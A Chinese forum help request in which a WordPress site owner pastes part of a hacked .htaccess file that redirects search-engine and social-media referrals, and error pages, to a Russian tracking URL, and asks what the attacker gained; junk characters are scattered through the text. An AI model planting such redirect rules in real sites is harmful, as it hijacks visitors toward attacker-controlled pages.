|
一个wordpress站点, 今天偶尔将二级目录打错,发现跳转到 - http://pyatnickiy.ru/track.php
纳闷,一顿搜索,发现站点根目录下的.haccess文件达27KB
) D1 k& @% h7 q8 y' t7 Y打开一看,部分代码如下 - <IfModule mod_rewrite.c>
# T d8 Y0 G# p - RewriteEngine On
3 f7 b Y) X6 C7 e8 b7 r: d( T - RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) " o5 M8 @( x I+ f4 j" e9 W/ _
- RewriteRule ^(.*)$ http://pyatnickiy.ru/track.php [R=301,L]
7 ]% S2 |$ {; P! L0 k - RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) ( K; t4 A. n, q' _! |
- RewriteRule ^(.*)$ http://pyatnickiy.ru/track.php [R=301,L] 8 j% U5 A- H- v6 e$ i
- </IfModule> 8 a/ R, `6 F1 { A
- ErrorDocument 400 http://pyatnickiy.ru/track.php
3 J) S/ ~9 K" h) S0 ]) s: W6 ` - ErrorDocument 401 http://pyatnickiy.ru/track.php
3 \8 F& ], U+ ]8 V( y. j+ }5 e7 E - ErrorDocument 403 http://pyatnickiy.ru/track.php : W( c( U1 o A; T. {; f
- ErrorDocument 404 http://pyatnickiy.ru/track.php 7 F" {: y% Q6 ~, C4 o9 O% o A
- ErrorDocument 500 http://pyatnickiy.ru/track.php
这是曾经被别人黑过了吧? 黑客到我站点里做了什么,对他有什么好处呢? / a% c& n, v2 k3 H3 J% D
求助,谢了先% |7 b5 B* f+ @2 X
; o0 A& F5 Y# ?
( q, Z2 M$ W+ F
2 W1 ^7 L" K- n* r9 z0 f1 }2 \ | 
发表于 2013-4-9 16:22:26
楼主
发表于 2013-4-9 16:35:26
发表于 2013-4-9 17:22:02
